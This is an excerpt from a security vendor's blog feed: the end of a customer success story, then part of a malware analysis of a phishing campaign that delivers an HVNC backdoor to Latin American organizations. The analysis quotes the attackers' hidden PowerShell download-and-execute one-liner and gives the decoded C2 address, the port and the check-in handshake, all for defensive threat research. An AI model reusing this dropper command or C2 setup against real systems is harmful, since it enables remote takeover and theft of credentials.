<li><strong>The Vector:</strong> The spear-phishing email contained a benign-looking PDF attachment. </li>



<li><strong>The Redirect:</strong> Inside the PDF was a malicious link directing the user to download an external archive. </li>



<li><strong>The Stealth Layer:</strong> This external archive was an encrypted, password-protected ZIP file. Critically, the decryption password was only displayed as text within the PDF attachment itself. </li>
</ol>



<p class="wp-block-paragraph">Because the ZIP archive was encrypted, automated mail gateway filters and static antivirus scanners were unable to parse or inspect the files hidden inside. </p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p class="has-background wp-block-paragraph" style="background-color:#f9f9f9"><em>Looking at the process tree, we could clearly see the progression from Outlook to Edge, and finally to the malware execution. This process tree allowed us to visually confirm that the exact execution path we observed on our employee&#8217;s endpoint was mirrored safely inside the ANY.RUN virtual machine.</em></p>
<cite><strong>Philipp Z., Security Lead</strong> </cite></blockquote>



<p class="wp-block-paragraph">This precise match gave the team absolute certainty that they had identified the exact source of the infection. Without ANY.RUN, the phishing email would have remained active on the mail server, posing an active threat of lateral forwarding or secondary infection.  </p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p class="has-background wp-block-paragraph" style="background-color:#f9f9f9"><em>An antivirus alert for us is not the end of a report, but the start&#8230; The email wasn&#8217;t automatically removed because the context was missing from the email to the finally malicious execution chain. Without the ANY.RUN analysis, we supposedly would not have been able to remove the email, so maybe it would have been forwarded or used to execute on another device.</em> </p>
<cite><strong>Philipp Z., Security Lead</strong></cite></blockquote>



<p class="wp-block-paragraph">Equipped with the full context from ANY.RUN, the SOC team systematically searched for and purged the malicious email from all other user mailboxes across the organization. </p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p class="has-background wp-block-paragraph" style="background-color:#f9f9f9"><em>It&#8217;s such a perfect example that I have saved the active ANY.RUN analysis link for internal training. It shows the team, from start to finish, exactly how an infection path moves from an email to a web-downloaded encrypted archive, and finally to a payload executing on the device.</em></p>
<cite><strong>Philipp Z., Security Lead</strong></cite></blockquote>



<h2 class="wp-block-heading">Business Value: Hard ROI and a Leap in Cybersecurity Maturity </h2>



<p class="wp-block-paragraph">Deploying ANY.RUN delivered an immediate Return on Investment (ROI) and a leap in operational maturity. </p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p class="has-background wp-block-paragraph" style="background-color:#f9f9f9"><em>For a lot of C-suite or manager people that just look at the numbers, it&#8217;s hard to get a clean return on investment number, because IT security just costs something&#8230; But for me personally, I think the biggest indicator that really works is just the time. If you have a look at the time that a SOC analyst costs, and just look at the numbers for the time saved per incident, you can directly get a good return number.</em></p>
<cite><strong>Philipp Z., Security Lead</strong> </cite></blockquote>



<p class="wp-block-paragraph">Instead of being forced to hire additional highly specialized analysts to handle an escalating threat landscape, the existing 5-person team seamlessly absorbs a massive enterprise workload, completely stabilizing labor costs while keeping the company secure. </p>



<p class="wp-block-paragraph">Beyond the financial metrics, ANY.RUN has catalyzed a profound shift in the company’s internal security posture, representing a significant <strong>jump in maturity</strong>. </p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p class="has-background wp-block-paragraph" style="background-color:#f9f9f9"><em>For us internally, it definitely was a big jump in maturity, going from a small team that handles these incidents manually with a laptop, to handling incidents cleanly, timely, and at scale. You can&#8217;t put a price tag on usability, but it&#8217;s just so much easier now.</em></p>
<cite><strong>Philipp Z., Security Lead</strong></cite></blockquote>



<p class="wp-block-paragraph">The security team has evolved from a small group reacting slowly through manual, localized workflows into a highly efficient, distributed operation capable of investigating enterprise-level threats at scale. </p>



<p class="wp-block-paragraph">By providing a lightning-fast sandbox that analysts actually enjoy using, the firm has built a more resilient, highly motivated, and burnout-free defensive unit.  </p>



<p class="wp-block-paragraph">Ultimately, ANY.RUN gives the German manufacturer the technical agility to respond to threats effectively, protecting both their physical operations and their standing as a trusted global industrial partner. </p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Save up to 15 minutes on every alert investigation.
</span> 
<br>
Turn analyst time into measurable SOC ROI.
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=german-manufacturer-success-story&amp;utm_term=090926&amp;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Boost Analyst Capacity </a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">Conclusion </h2>



<p class="wp-block-paragraph">For this German manufacturer, managing a footprint of 10,000 endpoints with a team of only five colleagues required a highly efficient way to analyze daily security threats. Replacing their manual, physical forensic laptop with ANY.RUN streamlined this process, saving a median of 15 minutes of setup and analysis time per alert. This practical optimization has allowed the compact team to comfortably handle 20 to 40 tasks daily, prevent analyst burnout, and support a jump in the team&#8217;s internal operational maturity.  </p>



<p class="wp-block-paragraph">We would like to extend our sincere thanks to Philipp Z. for sharing his team’s experience and showing how a lean team can successfully keep a large enterprise footprint secure. </p>



<h2 class="wp-block-heading">About ANY.RUN</h2>



<p class="wp-block-paragraph"><a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=german-manufacturer-success-story&amp;utm_term=090926&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener"><strong>ANY.RUN</strong></a> is a leading provider of interactive malware analysis and threat intelligence solutions trusted by more than <strong>16,000 organizations worldwide</strong>, including <strong>74% of the Fortune 100</strong>.</p>



<p class="wp-block-paragraph">Its <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=german-manufacturer-success-story&amp;utm_term=090926&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener"><strong>Interactive Sandbox</strong></a> and <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=german-manufacturer-success-story&amp;utm_term=090926&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener"><strong>Threat Intelligence</strong></a> solutions help SOC teams analyze suspicious files and URLs, uncover malicious behavior, enrich investigations with actionable context, and connect related activity across infrastructure and campaigns.</p>



<p class="wp-block-paragraph">This helps security teams <strong>reduce investigation time, lower MTTD and MTTR, and contain threats before business impact grows.</strong></p>
<p>The post <a href="https://any.run/cybersecurity-blog/german-manufacturer-success-story/">15 Minutes Saved Per Alert: How a Lean German Manufacturer Protects 10,000 Endpoints with ANY.RUN</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://any.run/cybersecurity-blog/german-manufacturer-success-story/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>HVNC Backdoor Targets LATAM Organizations with Fake Tax and DocuSign Lures</title>
		<link>https://any.run/cybersecurity-blog/hvnc-backdoor-targets-latam/</link>
					<comments>https://any.run/cybersecurity-blog/hvnc-backdoor-targets-latam/#respond</comments>
		
		<dc:creator><![CDATA[Moises Cerqueira (0xOlympus)]]></dc:creator>
		<pubDate>Tue, 08 Sep 2026 10:24:30 +0000</pubDate>
				<category><![CDATA[Malware Analysis]]></category>
		<category><![CDATA[ANYRUN]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[malware analysis]]></category>
		<guid isPermaLink="false">https://any.run/cybersecurity-blog/?p=22995</guid>

					<description><![CDATA[<p>Editor’s note: The analysis is authored by Moises Cerqueira, malware researcher &#38; threat hunter. You can find Moises on LinkedIn and X. Fake tax documents are being used to target organizations across LATAM, delivering a custom HVNC backdoor built for stealthy, persistent access. Once installed, the malware can give attackers hidden remote control, steal browser [&#8230;]</p>
<p>The post <a href="https://any.run/cybersecurity-blog/hvnc-backdoor-targets-latam/">HVNC Backdoor Targets LATAM Organizations with Fake Tax and DocuSign Lures</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p class="wp-block-paragraph"><em>Editor’s note: The analysis is authored by Moises Cerqueira, malware researcher &amp; threat hunter. You can find Moises on <a href="https://www.linkedin.com/in/moises-cerqueira/" target="_blank" rel="noreferrer noopener">LinkedIn</a> and <a href="https://x.com/0x_Olympus" target="_blank" rel="noreferrer noopener">X</a>.</em></p>



<p class="wp-block-paragraph">Fake tax documents are being used to target organizations across LATAM, delivering a custom HVNC backdoor built for stealthy, persistent access. Once installed, the malware can give attackers hidden remote control, steal browser data, monitor keystrokes, and survive system reboots.</p>



<p class="wp-block-paragraph">The attack chain combines trusted business lures, anti-analysis techniques, and infrastructure designed to keep access hidden. For security leaders, the risk goes beyond a single compromised endpoint: persistent access can expose credentials, sensitive data, and business systems while giving attackers more time to move deeper into the environment.</p>



<h2 class="wp-block-heading">HVNC Campaign Overview</h2>



<p class="wp-block-paragraph">The campaign uses fake DocuSign notifications, NFe tax documents, and banking-themed phishing to deliver a custom HVNC backdoor. Once installed, it can give attackers hidden remote control and persistent access to compromised systems.</p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-371"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="2"
           data-rows="5"
           data-wpID="371"
           data-responsive="0"
           data-has-header="0">

                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-bold"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:50%;                    padding:10px;
                    "
                    >
                                        Threat type                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:50%;                    padding:10px;
                    "
                    >
                                        Multi-stage phishing campaign; custom HVNC backdoor                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-bold"
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Targeting                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Banking and financial services in Latin America                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-bold"
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Delivery                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Fake DocuSign and NFe tax-document lures; related ClickFix-style delivery also observed                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-bold"
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Objective                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Persistent remote access and control of compromised systems                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-bold"
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Attribution                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Unconfirmed; Silver Fox / Winos4.0-adjacent tradecraft at medium confidence                    </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-371'>
table#wpdtSimpleTable-371{ table-layout: fixed !important; }
table#wpdtSimpleTable-371 td, table.wpdtSimpleTable371 th { white-space: normal !important; }
</style>




<h2 class="wp-block-heading">Business Risks Behind the HVNC Campaign</h2>



<p class="wp-block-paragraph">For organizations, the danger lies in how much access the malware can provide once a device is compromised. Its capabilities can increase both the scope of exposure and the time attackers remain active in the environment.</p>



<ul class="wp-block-list">
<li><strong>Credential and session theft:</strong> The malware monitors keystrokes and targets Firefox cookies, browsing history, and permissions, putting account access at risk.</li>



<li><strong>Hidden remote control:</strong> HVNC functionality lets attackers interact with the compromised system through a hidden desktop, including screen capture and simulated mouse and keyboard input.</li>



<li><strong>Persistent access:</strong> The backdoor establishes Startup-folder persistence, allowing it to remain active after system reboots.</li>



<li><strong>Reduced visibility for defenders:</strong> The malware checks for more than 20 AV/EDR processes and adjusts its behavior when security software is present.</li>



<li><strong>Longer exposure to compromise:</strong> Its persistent C2 connection and repeated reconnection attempts are designed to keep the implant available even through network interruptions.</li>
</ul>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Cut the time attackers have inside your environment.
</span> 
<br>
Reduce exposure before it turns into business loss.
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=hvnc-backdoor-targets-latam&#038;utm_term=080926&#038;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Reduce Business Risk </a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">Who Is This Campaign Targeting?</h2>



<p class="wp-block-paragraph">The campaign appears financially motivated, with a clear focus on <strong>banking and financial services in Latin America</strong>. <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=hvnc-backdoor-targets-latam&amp;utm_term=080926&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat intelligence analysis </a>using ANY.RUN data revealed phishing infrastructure impersonating major banks, alongside fake tax-document lures designed to blend into routine financial and administrative workflows.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" width="1024" height="560" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-lookup-query-1024x560.png" alt="TI Lookup used to get deeper context into HVNC Backdoor attack" class="wp-image-23030" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-lookup-query-1024x560.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-lookup-query-300x164.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-lookup-query-768x420.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-lookup-query-1536x840.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-lookup-query-2048x1120.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-lookup-query-370x202.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-lookup-query-270x148.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-lookup-query-740x405.png 740w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>TI Lookup used to get deeper context into HVNC Backdoor attack</em></figcaption></figure>
</div>


<h2 class="wp-block-heading">Attack Chain Overview</h2>



<p class="wp-block-paragraph">The campaign follows a <strong>four-stage infection chain</strong> that moves from fake DocuSign and NFe tax-document lures to a persistent HVNC backdoor. Each stage uses separate delivery, staging, and C2 infrastructure, making the operation harder to trace and disrupt.</p>



<ul class="wp-block-list">
<li><strong>Stage 1 &#8211; Initial Access</strong>: a spoofed DocuSign “document ready for download” page (and a parallel NFe/DANFE-themed lure) with anti-sandbox and anti-automation logic, serving a dynamically generated ZIP archive per visitor. </li>



<li><strong>Stage 2 &#8211; Dropper:</strong> a Windows .lnk shortcut disguised as a tax-document receipt, whose target is a hidden PowerShell one-liner that downloads and executes a second-stage binary. </li>



<li><strong>Stage 3 &#8211; Loader:</strong> an NSIS self-extracting installer bundling the final payload alongside legitimate-looking runtime DLLs (OpenCV, MSVC redistributables) used as cover noise. </li>



<li><strong>Stage 4 &#8211; Payload:</strong> a 64-bit backdoor (masquerading as “Windows Update Assistant” / Microsoft Corporation in its version metadata, while unsigned) implementing AV/EDR discovery, a hidden virtual desktop for remote operator control, keystroke monitoring, Firefox cookie/history/permission theft, and a browser-redirection command &#8211; all communicating over TCP/27015 to infrastructure hosted with GHOSTnet GmbH (Frankfurt, DE). </li>
</ul>



<h2 class="wp-block-heading">The Lure: A Fake DocuSign Notification With a Personality</h2>



<p class="wp-block-paragraph">The entry point is a cloned DocuSign “your document is ready” page. It&#8217;s a convincing fake &#8211; the logo is pulled live from DocuSign&#8217;s own CDN &#8211; but the copy gives it away: the document name reads “Documento_Contrato_Signado.pdf,” a non-native construction of the Portuguese word for “signed.” A build marker (0a4b2aff1c2ebf8b) sits in the HTML, likely a phishing-kit fingerprint we can use to track this kit elsewhere.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="463" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/fake-DocuSign-1024x463.png" alt="The fake DocuSign page clones the real logo from DocuSign's CDN" class="wp-image-23019" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/fake-DocuSign-1024x463.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/fake-DocuSign-300x136.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/fake-DocuSign-768x347.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/fake-DocuSign-1536x695.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/fake-DocuSign-370x167.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/fake-DocuSign-270x122.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/fake-DocuSign-740x335.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/fake-DocuSign.png 1682w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>The fake DocuSign page clones the real logo from DocuSign&#8217;s CDN but gives itself away with awkward Portuguese phrasing in the filename.</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">Before it hands over anything, the page runs a small anti-bot gauntlet: it checks navigator.webdriver, zero-size browser windows, and known headless-browser artifacts, then waits for two genuine mouse/scroll/keyboard events (with a 3.5-second fallback) before arming the download. A silent background request also fingerprints the visitor&#8217;s browser, OS, timezone and screen size and reports it to the server first &#8211; almost certainly used to decide who actually gets a payload.</p>



<p class="wp-block-paragraph">Once satisfied, the page doesn&#8217;t link to a file &#8211; it POSTs to api.php and gets back a JSON blob containing a base64-encoded ZIP, a SHA-256 hash, and a cheeky bit of social engineering: an alternate .nfe extension “in case the download gets blocked by SmartScreen.”</p>


<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="832" height="229" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/backdoor-attack.png" alt="Instead of a direct file link, the server returns the payload base64-encoded inside a JSON response - a simple but effective trick against extension- and URL-based filtering." class="wp-image-23020" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/backdoor-attack.png 832w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/backdoor-attack-300x83.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/backdoor-attack-768x211.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/backdoor-attack-370x102.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/backdoor-attack-270x74.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/backdoor-attack-740x204.png 740w" sizes="auto, (max-width: 832px) 100vw, 832px" /><figcaption class="wp-element-caption"><em>Instead of a direct file link, the server returns the payload base64-encoded inside a JSON response &#8211; a simple but effective trick against extension- and URL-based filtering</em></figcaption></figure>
</div>


<h2 class="wp-block-heading">From Shortcut to Shellcode: The LNK Dropper</h2>



<p class="wp-block-paragraph">Inside the ZIP sits a Windows .lnk shortcut disguised as an NFe (Brazilian electronic tax receipt) confirmation, alongside five decoy .txt files with fabricated company data &#8211; generated fresh for every download, using real, recognizable Brazilian company names to boost trust.</p>



<p class="wp-block-paragraph">The shortcut&#8217;s real target is powershell.exe, run with -WindowStyle Hidden -ExecutionPolicy Bypass, executing a one-liner that downloads a second-stage binary and runs it:</p>



<p class="has-background wp-block-paragraph" style="background-color:#eaf6ff">Invoke-WebRequest -Uri &#8220;http://&lt;staging-ip&gt;/dl.php?f=NotaFiscal&#8230;exe<br>&amp;k=nfe_valid_access_key_2026_secure&#8221; `<br>-OutFile &#8220;$env:USERPROFILE\Desktop\$env:USERNAME.exe&#8221;; Start-Process $out</p>



<p class="wp-block-paragraph">That k= parameter is a static access token gating the delivery server &#8211; a strong pivot for spotting other samples from the same kit, regardless of which IP is currently hosting it.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="76" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/05-1024x76.png" alt="The shortcut's real payload is a hidden PowerShell downloader - nothing in the shortcut's icon or name hints at this." class="wp-image-23021" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/05-1024x76.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/05-300x22.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/05-768x57.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/05-1536x114.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/05-370x27.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/05-270x20.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/05-740x55.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/05.png 1900w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>The shortcut&#8217;s real payload is a hidden PowerShell downloader &#8211; nothing in the shortcut&#8217;s icon or name hints at this</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">The shortcut&#8217;s own metadata turned out to be more useful than expected: Windows silently embeds the builder machine&#8217;s NetBIOS hostname into every .lnk file. Here, that hostname was “servee” &#8211; a detail that becomes very relevant once we get to infrastructure.</p>



<h2 class="wp-block-heading">An Installer in Disguise: NSIS and the Weight of Legitimacy</h2>



<p class="wp-block-paragraph">The downloaded file is an NSIS (Nullsoft Scriptable Install System) self-extracting installer with a 22.9 MB compressed overlay. Unpacked, it drops:</p>



<ul class="wp-block-list">
<li>UpdateAssistant.exe &#8211; the real payload</li>



<li>opencv_world4120.dll (~22 MB) &#8211; a genuine OpenCV library</li>



<li>Four legitimate Microsoft Visual C++ redistributable DLLs</li>
</ul>



<p class="wp-block-paragraph">None of these DLLs are hijacked or trojanized &#8211; they&#8217;re just real, large, familiar-looking files bundled in to make the folder feel like a normal software installer. The actual malicious logic lives entirely in the one 177 KB executable sitting quietly among them.</p>


<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="901" height="212" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/real-libraries.png" alt="22 MB of real, unmodified libraries surround an 80 KB malicious executable - bulk as camouflage" class="wp-image-23022" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/real-libraries.png 901w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/real-libraries-300x71.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/real-libraries-768x181.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/real-libraries-370x87.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/real-libraries-270x64.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/real-libraries-740x174.png 740w" sizes="auto, (max-width: 901px) 100vw, 901px" /><figcaption class="wp-element-caption"><em>22 MB of real, unmodified libraries surround an 80 KB malicious executable &#8211; bulk as camouflage</em></figcaption></figure>
</div>


<h2 class="wp-block-heading">Cracking the XOR: Finding the C2 Inside the Binary</h2>



<p class="wp-block-paragraph">UpdateAssistant.exe claims to be Microsoft Corporation&#8217;s “Windows Update Assistant” in its version metadata &#8211; while being completely unsigned. Static analysis in Detect It Easy immediately flags the giveaways: UnsignedMicrosoft, repeated XorInLoop patterns, and YARA hits for KeyloggerApi and BrowserStealer.</p>



<p class="wp-block-paragraph">Reversing the network-setup routine in IDA Pro shows why. The C2 host is stored as 12 raw bytes, XOR-encoded with a single byte (0x37):</p>



<p class="has-background wp-block-paragraph" style="background-color:#eaf6ff">Raw:     02 19 05 04 07 19 05 03 0E 19 03 0E<br>XOR key: 0x37<br>Result:  5.230.249.49</p>



<p class="wp-block-paragraph">The destination port is stored in plaintext: 27015 &#8211; the default port for Source-engine games like Counter-Strike. Reusing a gaming port is a small but deliberate choice: it blends the beacon into ordinary consumer traffic on a casual netflow review.</p>


<div class="wp-block-image">
<figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" width="253" height="504" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/A-single-byte-XOR.png" alt="A single-byte XOR is all that stands between the readable C2 configuration and casual static analysis.
" class="wp-image-23023" style="width:237px;height:auto" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/A-single-byte-XOR.png 253w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/A-single-byte-XOR-151x300.png 151w" sizes="auto, (max-width: 253px) 100vw, 253px" /><figcaption class="wp-element-caption"><em>A single-byte XOR is all that stands between the readable C2 configuration and casual static analysis.</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">A second function decodes a small set of browser names (“chrome,” “firefox,” “msedge,” “brave,” “opera”) using a different XOR key (0x13), building commands like cmd.exe /c start chrome.exe &lt;operator-supplied URL&gt; &#8211; a command the operator can issue to force the victim&#8217;s browser open to any page of their choosing.</p>



<h2 class="wp-block-heading">The Malware Introduces Itself: A Live HVNC Handshake</h2>



<p class="wp-block-paragraph">Static analysis told us the malware could create a hidden desktop (CreateDesktopA, SetThreadDesktop), capture the screen, inject input, and poll the keyboard state &#8211; the textbook ingredients of an HVNC implant. What we didn&#8217;t expect was for the malware to say so, out loud, on the wire.</p>



<p class="wp-block-paragraph">Detonating a live build in ANY.RUN&#8217;s <a href="https://any.run/features/?utm_medium=article&amp;utm_campaign=hvnc-backdoor-targets-latam&amp;utm_term=080926&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a> and opening the raw TCP stream to the C2 in Text view surfaced this handshake, sent in the clear before any operator interaction:</p>



<p class="has-background wp-block-paragraph" style="background-color:#eaf6ff">HVNC-&lt;client id&gt;<br>CLIENT_ID:HVNC-&lt;client id&gt;<br>COMPUTER:&lt;hostname&gt;<br>USER:&lt;username&gt;<br>OS:&lt;Windows version&gt;<br>VERSION:1.2.0.4.71<br>MODE:FULL<br>DETAILS:[SISTEMA] Arquitetura: x64 (AMD64)<br>[SISTEMA] Processadores: 6<br>[SISTEMA] CPU: AMD Ryzen 5 3500 6-Core Processor<br>[SISTEMA] Memória Total: 6138 MB<br>[SISTEMA] Memória Disponível: 4343 MB<br>[SISTEMA] Antivírus: Não detectado (modo stealth)<br>[SISTEMA] Hostname: &lt;hostname&gt;<br>IDENTIFIER_CHANNEL:20</p>



<p class="wp-block-paragraph">The banner literally opens with HVNC-. The malware authors named their own protocol, and it checks in with a full victim fingerprint &#8211; CPU model, RAM, architecture, and, tellingly, the result of the antivirus-discovery loop we found in static analysis. That loop isn&#8217;t just for self-throttling; its output is reported straight to the operator&#8217;s panel per victim. After the handshake, the stream switches to a binary frame format consistent with screen-tile data feeding the malware&#8217;s built-in OpenCV pipeline.</p>


<div class="wp-block-image">
